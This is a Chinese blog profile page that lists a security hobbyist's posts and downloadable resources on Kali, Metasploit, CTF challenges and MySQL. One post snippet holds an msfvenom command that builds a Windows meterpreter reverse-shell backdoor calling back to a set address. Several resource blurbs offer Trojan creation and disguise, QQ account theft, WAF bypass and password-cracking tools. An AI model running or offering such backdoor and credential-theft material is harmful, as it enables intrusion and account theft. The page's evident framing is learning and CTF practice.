自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 资源 (43)
  • 收藏
  • 关注

转载 多种后门生成

多种后门生成windows -->使用模块“windows/meterpreter/reverse_tcp”命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe参考我的远程控制软件”linux -->使用模块“linux/x86/...

2019-09-06 10:14:41 483

原创 SMB 获取系统信息与SSH与FTP服务识别

SMB 获取系统信息与SSH与FTP服务识别****我们可以通过smb_version来查看哪些IP开启了445,然后我们就可以通过445获取系统信息最后设置参数,扫描出结果SSH与FTP服务识别SH–>安全外壳协议,应用于Linux、AIX、Solaris、Digital UNIX、Irix等操作系统也是可以使用ssh_servion检查是否有网段存在ssh服务开启设置参...

2019-09-06 10:06:06 288

原创 使用msfconsole实现网段端口扫描

msfconsole实现网段端口扫描在nmap中可以直接使用nmap,例如:扫描完整端口、服务及版本使用portscan模块进行局域网IP搜索使用use命令进行syn扫描然后我们可以使用showo ptions显示相关需要配置的信息注:在Required中显示no的才是我们需要设置的信息,其他yes的是可以不用设置的,当然,你看得懂设置也行下面进行set赋值扫描结果Ct...

2019-09-06 09:58:21 2555

转载 CTF-PHP常见考点实例小结

CTF-PHP常见考点实例小结0x00 CTF-PHP常见考点1.php弱类型的比较2.php断言问题3.php读取文件问题4.updatexml(),__wakeup ,preg_match等函数考点5.sha1()函数与md5()知识点6.异或注入绕过考点7.源文件泄露8.extract变量覆盖9.strcmp漏洞…10.RCE的命令执行绕过考点总结的不是很全面,一些常见的考点,希望师傅们多多指点看到网上不少师傅的总结,感觉不错值得学习。下面取几个考点类型案例分析帮助理解,实

2021-11-18 17:05:31 386

转载 2021-11-10

一步一步学pwntools刚刚注册看雪,就来水一篇文章。本来想发发我之前CTF的writeups,不过数量有点多,而且网上也有很多质量不错的wp,就发回之前写的pwntools新手教程。网上纯新手教程比较少,一般都是直接调用api,这篇主要是想给新手对pwntool一个更整体的认识。原文是我用英文写的,如果翻译的不好,请见谅。英语原文:http://www.auxy.xyz/tutorial/2018/09/01/Pwntools-Step-By-Step.html下面开始正文:**序pwn

2021-11-10 15:10:40 131

原创 华罗学安全公众号各笔记

华罗学安全公众号各笔记公众号目前的笔记有(包括待期)如下kali渗透技术详解MySQL从入门到精通wireshark数据包分析实战详解网络攻防案例教程零基础学python(待期)详情请回复关键字wireshark、kali、python、MySQL、网络攻防图片kali渗透技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识介绍、安装及配置Kali

2021-05-16 18:02:30 110

原创 MySQL数据库操作详解

MySQL数据库操作详解创建数据库create databases u1; 创建u1数据库create table uu1(id int(11)not null key,user varchar(23)not null,passwd varchar(23)not null); ##创建uu1表,限制输入id值为数值型,大小为11字节,且将其设置为主键。再创建user和passwd字段,输入类型不限,大小为23字节desc uu1; #查看uu1表的字段类型insert into uu1(id,u

2021-04-16 17:57:30 100

原创 kali入侵权限提升

权限提升是指将原来的最低权限提高到最高权限,而这个可以使用假冒令牌,本地权限提升和社会工程学等方式实现。本章将介绍其中的各种方法使用假冒令牌本地权限提升攻击使用社会工程学工具包(set)使用set实施攻击使用假冒令牌假冒令牌就是通过假冒管理员的权限进行计算机的各种操作。工作机制简单来说就算用户端向认证服务器申请了认证之后再向服务器申请了密钥,然后攻击者直接攻击服务器获取密钥从而假冒管理员使用假冒令牌首先攻击一台靶机获取meterpreter shell会话加载模块。然后查看帮助信息

2020-12-31 20:45:17 1966

原创 kali的基本安装与使用配置

将kail安装至硬盘Kail linux的下载地址http://www.kail.org/downloads下载到DVD或者是U盘中之后就可以进入boos里面讲启动模式切换为u盘启动,进而进行安装安装至USB驱动器首先需要有一个不低于8GB的U盘,然后进入kail官网下载ISO,启动工具win32 Disk Imager工具,将ISO文件放在USB驱动器上。再使用UNetbootin工具将设备做成一个USB启动器,选择完之后重启即可安装至树莓派从http://www.offensive-secur

2020-12-31 20:35:13 1166

原创 MySQL数据库的基本操作流畅版

MySQL数据库的基本操作流畅版show databases;查看本地数据库2. create database oo;创建名为oo的数据库use oo;指定数据库oo(指定了数据库在可以在接下来进行写入)3. create table uu(id varchar(30) not null key, user varchar(30) not null, passwd varchar(30));创建表,并设置内容行id,user,passwd,其中id设置为主键,其余设置为不允许为空值d

2020-12-31 20:18:08 107 1

dos基础命令

基本上包含了windows下的所有的dos命令都有在里面,,

2018-12-17

netcat详解

nc这里指NetCat,它在网络工具中有“瑞士军刀”美誉,而文档讲的就是这个的一些介绍和使用

2018-12-16

2019年网络搭建与应用赛题(样)

2019年福建省所发布的中职组网络搭建与应用的公开赛题,喜欢的可看下

2018-12-14

kali的实战渗透

写的是kali的实战渗透,其中有讲msf渗透,kali基础命令使用等等等,非常多

2018-12-14

各协议详解

各种协议的详解,总共写了五个协议的详解,分别是http、tcp/ip、tcp、udp、icmp,写得非常详细,喜欢的自下

2018-12-14

WAF绕过神器

顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。

2018-12-14

网站目录查找器

顾名思义,一款网站目录的查找器(Serv-u目录查找器)

2018-12-14

鬼哥URL编码转换工具

顾名思义,就是鬼哥创建的一款URL编码转换的工具。。。

2018-12-14

ACCESS密码读取

如果Access的数据库有密码的话您可以选择此款小工具进行破解

2018-12-14

mstsc突破连接限制

创建与终端服务器或其他远程计算机的连接,编辑现有"远程桌面连接(.rdp)"配置文件,并将 Windows XP 连接(使用"客户端国防部设备 接管理器"创建的连接)迁移到新的 .rdp 文件中。就是远程桌面连接 而这个工具则是突破连接上限的

2018-12-14

web扫flag的python文件

web扫flag的一个python文件,怎么用就不用说了吧,随便在一个有python3.0或2.0的机子上就能用了,不过你那个flag的路径在哪,那么你在py文件中的flag路径也得改哈,别傻福福的直接用

2018-12-14

社工大师软件

软件不错,就是要登录账号密码,而这个账号密码是需要向官方买的,所以看你喜不喜欢咯

2018-12-12

Ethereal使用方法

Ethereal是免费的网络协议检测程序,支持Unix,Windows。让您经由程序抓取运行的网站的相关资讯,包括每一封包流向及其内容、资讯可依操作系统语系看出,方便查看、监控TCP session动态等等. 文档讲的就是它的使用方法

2018-12-12

arping等工具的使用

其中讲了,arping、fping、nbtscan、xprobe2、genlist的使用

2018-12-12

msfconsole

kail、ubantu的msfconsole平台的用法,如search导入,use调用等等

2018-12-12

cmd命令大全

主要讲授了cmd的命令大全,如net user 时间、日期、创建用户等等

2018-12-12

ca证书颁发

主要讲了ca证书的搭建颁发,,使网站可以变为https。。

2018-12-12

windows2003关闭135端口

主要讲授了关闭windows2003的135端口,以便使用ms03_026等漏洞攻击

2018-12-12

飞思卡尔MScan

飞思卡尔MScan工具 具体用法请自行百度

2018-12-12

椰树V1.9接口修复版

椰树web扫描器的源码 ,是源码,可以自己编译修改的

2018-12-12

超强网站扫描

网站后台目录扫描工具, 调用外部核心扫描网站后台目录

2018-12-12

Seay2.2修改版

  Seay PHP代码审计工具是一款可以支持单个关键字扫描,批量函数扫描,批量正则匹配的软件,而且正则表达式扫描精确度高,效率高。

2018-12-12

Web日志安全分析工具

Web日志安全分析工具能够对Web日志进行安全分析,可快速从Web日志中发现可疑的恶意攻击行为,并自动识别攻击者IP所在物理位置,最后生成可读性好的安全分析报告,便于安全人员分析攻击者的入侵过程。

2018-12-12

K8飞刀最新版

K8飞刀最新版 网络安全测试工具 编码解码 一句话连接 批量解密

2018-12-11

nmap具体用法

主要写了nmap的用法,如sU,sA,A,圣诞树,无ping扫描等等

2018-12-11

Wvs安全测试工具

WVS(Web Vulnerability Scanner)是一个自动化的Web应用程序安全测试工具

2018-12-11

ASPack加壳工具

ASPack 是专门对 WIN32 可执行程序进行压缩的工具,压缩后程序能正常运行,不会受到任何影响。而且即使你已经将 ASPack 从系统中删除,曾经压缩过的文件仍可正常使用。

2018-12-11

Xshell终端模拟软件

Xshell 是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。

2018-12-11

求立方合。。。。。。。。.cpp

本关需要你使用循环语句求一个四位数的各位数字的立方和。C语言循环语句专项练习题

2021-10-22

组合排列计算题.cpp

C语言循环语句专项练习题

2021-10-22

CA证书,web搭建

里面写的是Web服务器的搭建和后续的CA证书的颁发。比较你颁发CA需要一个web网站,所以就顺便也写进去了

2018-12-26

各地市赛的题集

中职组网络空间安全各地市赛题集,总的来说就是各市中职组的比赛题集全在里面

2018-12-19

网络攻防案例(上半部)

这个是根据网络攻防案例这本书所写的文档,不过只有上半部分,下半部分还在持续更新中。里面我写了很多,花了我半个多月整出来的文档,不过最有价值的应该是我写了你如果生成木马,伪装木马,传木马。当然还有其他的,如qq盗号,windows改密码啥的。喜欢的记得下方评论给个好评

2018-12-13

iPsec搭建使用

主要讲的是IPsec的搭建,非常详细,图解配文字,一般人都看得懂吧

2018-12-13

meterpreter环境下的命令集

非常值的一个东西,就是你使用msf平台攻进靶机后的meterpreter下的所有命令集都有详细的讲解,非常好

2018-12-13

一些arping的用法

一些arping的用法,内容比较少,只有8个用法。下载的时候请想好

2018-12-13

网络空间安全的一些题目

里面主要是一些SQL、XSS、CSRF,命令注入,文件攻防等知识的题目

2018-12-13

思维导图的破解版

思维导图的破解版,注意在下载的时候记得先把网络断了,然后里面有个小程序是有秘钥的,之后思维导图进去输入秘钥在开启网络就可以用了,不会的下方留言

2018-12-13

web渗透基础基础知识

主要是写了web渗透的基本知识,,里面也有些图解,可以更好地理解

2018-12-13

端口解析1-2504

里面主要写的是1到2504端口的解说,将这些端口都是干什么用的

2018-12-13

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除